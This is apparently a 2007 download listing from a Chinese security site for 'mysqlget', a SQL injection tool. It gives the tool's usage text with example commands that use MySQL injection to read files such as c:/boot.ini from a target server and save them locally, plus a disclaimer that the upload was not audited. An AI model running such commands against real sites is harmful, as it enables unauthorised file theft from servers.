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mysqlget V1.1
发表日期:2007-03-13 11:02:04文件大小:15.10 K 下载次数:7680  

文件大小:15.10 K
下载说明: mysqlget for mysql injection Version 1.0.3 xdiyer at gmail.com http://xdiyer.uni.cc --------------------------------------------------- Usage: mysqlget Options: -t Target injection URL include %s to replace. -f Remote file to load or Function to echo. -s Local file to saved.If file exists,async append -r Range of remote file's offset or bytes -Mr Match code case response right. -Me Match code case response error. Example: mysqlget -t http://localhost/index.php?id=1%s -f c:/boot.ini -s E:/data.txt -Mr test 8 #Means get remote file all data save to local mysqlget -t http://localhost/index.php?id=1%s -f c:/boot.ini -s E:/data.txt -r 1-200 -Mr test 8 #Means get remote file 1-200 bytes save to local mysqlget -t http://localhost/index.php?id=1%s -f c:/boot.ini -s E:/data.txt -r 300 -Mr test 8 #Means get remote file 300 bytes down or async append to local file mysqlget -t http://localhost/index.php?id=1%s -f version() -Mr test 8 #Means echo function version() 注:本程序为用户上传,XFOCUS 未对其进行严格审计,无法保证其中不包含无意感染的病毒、编程失误导致的危险代码或故意添加的后门。XFOCUS不对因使用本程序造成的任何后果负责。我们建议您在不包含敏感数据的测试环境中运行该程序。

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